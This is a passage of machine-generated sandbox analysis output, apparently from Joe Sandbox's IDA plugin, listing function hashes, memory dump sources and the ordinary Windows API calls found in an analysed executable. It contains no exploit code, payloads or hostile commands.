              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentOpenProcessThreadToken
              • String ID:
              • API String ID: 3974789173-0
              • Opcode ID: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
              • Instruction ID: 860cc4eb02a62944bf3887a903e47b2f8ee2904974d0a0d7f3f97c5dce773448
              • Opcode Fuzzy Hash: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
              • Instruction Fuzzy Hash: E0E08636696311DBD7705FB07E0CB963BBCEF507A2F044828B645C9041DB348441CB71
              APIs
              • GetDesktopWindow.USER32 ref: 001C2187
              • GetDC.USER32(00000000), ref: 001C2191
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001C21B1
              • ReleaseDC.USER32(?), ref: 001C21D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 3f3a239195c6e8f7a592d68799f92c82a708cc0495a67bfe7d9e7eb4034c0fbe
              • Instruction ID: dc2e2f069c4a938f73fb6abf2cee8612455e67674ab0c4c19956565bff7e2e51
              • Opcode Fuzzy Hash: 3f3a239195c6e8f7a592d68799f92c82a708cc0495a67bfe7d9e7eb4034c0fbe
              • Instruction Fuzzy Hash: 44E09A75840704EFCB90AFA0E90CBAD7BF5EB1C310F118029F82A93221CB3981419F40
              APIs
              • GetDesktopWindow.USER32 ref: 001C219B
              • GetDC.USER32(00000000), ref: 001C21A5
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001C21B1
              • ReleaseDC.USER32(?), ref: 001C21D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 01925dacbd8f9ab174326a305f13a48c78e3a5a19cf3ffb5e1e3898298261e01
              • Instruction ID: 011943e2c01d3a7c65f69758568c48e1264d068745b55fbf7897e38869f034f5
              • Opcode Fuzzy Hash: 01925dacbd8f9ab174326a305f13a48c78e3a5a19cf3ffb5e1e3898298261e01
              • Instruction Fuzzy Hash: D9E01A75840704AFCBA1AFB0E90C69D7BF5EB5C310F118025F96A97621CB3991419F40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: %!
              • API String ID: 0-1084970021
              • Opcode ID: 7086714e48f126bbdf31e6653989306f4abed080f1b37056dc8c14b8eef3c958
              • Instruction ID: 235e8ca6ba1efd15f2bc35e31b354d80062c44a9964b3ed15c0b6cc83ab331e2
              • Opcode Fuzzy Hash: 7086714e48f126bbdf31e6653989306f4abed080f1b37056dc8c14b8eef3c958
              • Instruction Fuzzy Hash: C1B18B719002099BCF24FF98C8959FEBBB5EF54350F644026E906A7295EB349F82CF91
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __itow_s
              • String ID: xr$$xr$
              • API String ID: 3653519197-1694013976
              • Opcode ID: 77303ed4e6ff02f4bfd7655b3dbae21cc15ea0403fa498038e952b04ea433cc4
              • Instruction ID: 1dd7b791299597d4635179e2c75fdd0bd53b7b26796cde5f4c4bee9d706e6403
              • Opcode Fuzzy Hash: 77303ed4e6ff02f4bfd7655b3dbae21cc15ea0403fa498038e952b04ea433cc4
              • Instruction Fuzzy Hash: 29B18174A04209AFCB14EF54C8D0EBEB7B9FF58300F148459FA469B292DB74EA41CB60
              APIs
                • Part of subcall function 0019FEC6: _wcscpy.LIBCMT ref: 0019FEE9
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • __wcsnicmp.LIBCMT ref: 001EB298
              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001EB361
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
              • String ID: LPT
              • API String ID: 3222508074-1350329615
              • Opcode ID: e207625b98a3bf0aea0f4854f25268072e823b4d561078f547aa0717b1352796
              • Instruction ID: 7f4fab45cbef004c8e4e2e1e4f6bd344f74e3586d08882b81d7e774495741b2b
              • Opcode Fuzzy Hash: e207625b98a3bf0aea0f4854f25268072e823b4d561078f547aa0717b1352796
              • Instruction Fuzzy Hash: 0D617175E04615AFCB18EF95C886EAEB7B4BF18310F15406AF546AB291DB70AE40CB50
              APIs
              • Sleep.KERNEL32(00000000), ref: 00192AC8
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00192AE1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: GlobalMemorySleepStatus
              • String ID: @
              • API String ID: 2783356886-2766056989
              • Opcode ID: 071776587439965cc8fd166317c98fac2c086258072f948ae7c9234c54f5291c
              • Instruction ID: c1013657782e4c29ac81acd2006b1835e448737d1284f034fc6ffcc2062508dc
              • Opcode Fuzzy Hash: 071776587439965cc8fd166317c98fac2c086258072f948ae7c9234c54f5291c
              • Instruction Fuzzy Hash: A7515671418744ABD320BF50D88ABAFBBE8FF94314F56885DF1DA410A1DB308629CB26
              APIs
                • Part of subcall function 0018506B: __fread_nolock.LIBCMT ref: 00185089
              • _wcscmp.LIBCMT ref: 001E9AAE
              • _wcscmp.LIBCMT ref: 001E9AC1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscmp$__fread_nolock
              • String ID: FILE
              • API String ID: 4029003684-3121273764
              • Opcode ID: 64395c6e4294a533bb238c70d31c9b7f0a1dd2bedb8c3bb27e0b2a8a7ac0e05e
              • Instruction ID: fa05ad8d84f4bd02b1dbc0761356ceffc3620acf68e21d1f5dd8db93fad16187
              • Opcode Fuzzy Hash: 64395c6e4294a533bb238c70d31c9b7f0a1dd2bedb8c3bb27e0b2a8a7ac0e05e
              • Instruction Fuzzy Hash: 8941E971A00649BADF20AAA5DC45FEFBBFDDF55714F000079F900E7181D7759A048BA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID: Dt$$Dt$
              • API String ID: 1473721057-2789805393
              • Opcode ID: 71ff0daf9f6f8def90709bacc58c0fd4a99746aea14821d2a4b43fbea6f57ab2
              • Instruction ID: e22eb589c3b2db2e3e7bf06c0d43b93fd3cd6eb36835f8c769d25db198cd4223
              • Opcode Fuzzy Hash: 71ff0daf9f6f8def90709bacc58c0fd4a99746aea14821d2a4b43fbea6f57ab2
              • Instruction Fuzzy Hash: F651D1786083418FE754DF18C484A2ABBF1BF99354F95485EE9858B321D331E981CF82
              APIs
              • _memset.LIBCMT ref: 001F2892
              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001F28C8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CrackInternet_memset
              • String ID: |
              • API String ID: 1413715105-2343686810
              • Opcode ID: 629435f82f1d8a3cb9354bf9dfde9ebc1ff221ed127d2ba147e81d59afccde4c
              • Instruction ID: a1bd69c506ba46e1d4670cbe3d6a0be15b09d74ca19c005fdc11352d917afa3e
              • Opcode Fuzzy Hash: 629435f82f1d8a3cb9354bf9dfde9ebc1ff221ed127d2ba147e81d59afccde4c
              • Instruction Fuzzy Hash: DA310771800119AFCF01EFA1CC85EEEBBB9FF19300F104029F915A61A6DB719A56DFA0
              APIs
              • DestroyWindow.USER32(?,?,?,?), ref: 00206D86
              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00206DC2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$DestroyMove
              • String ID: static
              • API String ID: 2139405536-2160076837
              • Opcode ID: a4d6750ca99a8981e31162d3e3c2ce42aea24b18066a5149334fed9aae7e34e4
              • Instruction ID: 44823b6e782222b1b39740a065b8116ce5ed7929664637913212af00b1f2ab24
              • Opcode Fuzzy Hash: a4d6750ca99a8981e31162d3e3c2ce42aea24b18066a5149334fed9aae7e34e4
              • Instruction Fuzzy Hash: 6E31A171220305AEEB109F64CC84BFB73B9FF48724F108619F9A597191DB31AC61CB60
              APIs
              • _memset.LIBCMT ref: 001E2E00
              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001E2E3B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoItemMenu_memset
              • String ID: 0
              • API String ID: 2223754486-4108050209
              • Opcode ID: 02c90d25ca232a94bff2786050c17d99907f98f1c94f690a4ee18b8d01a5e242
              • Instruction ID: 230d3052d4f3eda5a9783fad7290e467c1825469de4c3a7a67d6028fc4f2bc3b
              • Opcode Fuzzy Hash: 02c90d25ca232a94bff2786050c17d99907f98f1c94f690a4ee18b8d01a5e242
              • Instruction Fuzzy Hash: B7310631600755EBEB34CF4ADD45BAEBBBDFF05350F18006DE985961A0E7B09944CB50
              APIs
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002069D0
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002069DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: Combobox
              • API String ID: 3850602802-2096851135
              • Opcode ID: d361036ab19269d324ddadb3c501a3247bee9d8bc43b84a3cb8bc73a2b1b3fbf
              • Instruction ID: 766e6644bc28760bb649509b72de50caca95a3e2d9fba5eae29c6b91b6c3d94c
              • Opcode Fuzzy Hash: d361036ab19269d324ddadb3c501a3247bee9d8bc43b84a3cb8bc73a2b1b3fbf
              • Instruction Fuzzy Hash: DB11B67172030E6FEF119F14CC84EAB376EEB953A4F114124F958976D2D6719C718BA0
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • GetWindowRect.USER32(00000000,?), ref: 00206EE0
              • GetSysColor.USER32(00000012), ref: 00206EFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ColorCreateMessageObjectRectSendStock
              • String ID: static
              • API String ID: 1983116058-2160076837
              • Opcode ID: e24028958e95a97ac54d8352c68c12905e4786f782d633839129270d7028e6ee
              • Instruction ID: 334cdf917613c064fa5addd168501314c0d7b1428354a2aa66ea12ce4f1de26c
              • Opcode Fuzzy Hash: e24028958e95a97ac54d8352c68c12905e4786f782d633839129270d7028e6ee
              • Instruction Fuzzy Hash: 1621597262020AAFDB14DFA8DD49EEA7BB8FB09314F004628FD55D3291E734E8619B50
              APIs
              • GetWindowTextLengthW.USER32(00000000), ref: 00206C11
              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00206C20
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LengthMessageSendTextWindow
              • String ID: edit
              • API String ID: 2978978980-2167791130
              • Opcode ID: 68575ed1e67d8cea431b479bc2e4a0da1562d3a80c8980fc0d576b683648f9d4
              • Instruction ID: b098eab3779f02b048996a7163aca903a24eb58c0fc33a73f1a6c2826e67099b
              • Opcode Fuzzy Hash: 68575ed1e67d8cea431b479bc2e4a0da1562d3a80c8980fc0d576b683648f9d4
              • Instruction Fuzzy Hash: 4D119DB1120309ABEB204E649C49AAA3769EB15378F504724F961E71E1C775DCB19B60
              APIs
              • _memset.LIBCMT ref: 001E2F11
              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001E2F30
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoItemMenu_memset
              • String ID: 0
              • API String ID: 2223754486-4108050209
              • Opcode ID: 8501b580b14e6bea700dde73fb968c96e35a3d1ad0f95a812b16401326b188ea
              • Instruction ID: f68577a653582346aae1c7789721ec5a4cbd14d6c63508fa6cd0751f29350590
              • Opcode Fuzzy Hash: 8501b580b14e6bea700dde73fb968c96e35a3d1ad0f95a812b16401326b188ea
              • Instruction Fuzzy Hash: 971104319016A4ABDB24DB59DC18B9D77BDEB02310F0900B1FC54A72A0D7B0ED04C791
              APIs
              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001F2520
              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001F2549
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Internet$OpenOption
              • String ID: <local>
              • API String ID: 942729171-4266983199
              • Opcode ID: 2c58ff02943ee9faae4c66fccdd27665070c76a8e0ba57f2ecade1af1a214304
              • Instruction ID: 42be0acdf798cb0dadb0fcd507932105b4420cdff7e6b4ba77f7f9e52aac744a
              • Opcode Fuzzy Hash: 2c58ff02943ee9faae4c66fccdd27665070c76a8e0ba57f2ecade1af1a214304
              • Instruction Fuzzy Hash: E411C2B0541229BADB288F518C99EFBFF68FF06751F10812AFA0586450D3B0A951DAF1
              APIs
                • Part of subcall function 001F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001F80C8,?,00000000,?,?), ref: 001F8322
              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • htons.WSOCK32(00000000,?,00000000), ref: 001F8108
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWidehtonsinet_addr
              • String ID: 255.255.255.255
              • API String ID: 2496851823-2422070025
              • Opcode ID: ecfaf58e286f5ae226728fc6da7f8ed6543e12c17b1da1a774b186cebb494bac
              • Instruction ID: e20eb8181c44ecdad57d160660d2305d2def3fdfbd351f6cc5a3c98cde5d5c97
              • Opcode Fuzzy Hash: ecfaf58e286f5ae226728fc6da7f8ed6543e12c17b1da1a774b186cebb494bac
              • Instruction Fuzzy Hash: 1A11E574204309ABCB20AF64CC46FBDB364FF14310F108627FA1197291DB71A811C751
              APIs
              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C26,002462F8,?,?,?), ref: 00190ACE
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • _wcscat.LIBCMT ref: 001C50E1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FullNamePath_memmove_wcscat
              • String ID: c$
              • API String ID: 257928180-2531412009
              • Opcode ID: a3fe7258114566040df37a1b5caa52eb596d02a9936a2cea546c9c53ab88b669
              • Instruction ID: 5e7806454f0eec6b4d4d9b7e54aa8b6bc50d9e16770fc68f191e69f8deb3853e
              • Opcode Fuzzy Hash: a3fe7258114566040df37a1b5caa52eb596d02a9936a2cea546c9c53ab88b669
              • Instruction Fuzzy Hash: 6411CE39A14208AACF05FBA4CD05ED977F9EF2C350B1000A5B949D7281EB30EB848B11
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001D9355
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassMessageNameSend_memmove
              • String ID: ComboBox$ListBox
              • API String ID: 372448540-1403004172
              • Opcode ID: ae85f4859378e3789a4d676a349759baeb10a629c70eed8c5417694c7ca72402
              • Instruction ID: 88d4f0152203e94e8a0c4d261b994dd4bcd434e5f8df3094df411c2d30a1b154
              • Opcode Fuzzy Hash: ae85f4859378e3789a4d676a349759baeb10a629c70eed8c5417694c7ca72402
              • Instruction Fuzzy Hash: 34019E75A45214ABCB08FBA4CC918FE77A9FF56720B54061AB932573D2DB3199088B60
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 001DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001DB0E7
              • SendMessageW.USER32(?,00000180,00000000,?), ref: 001D924D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
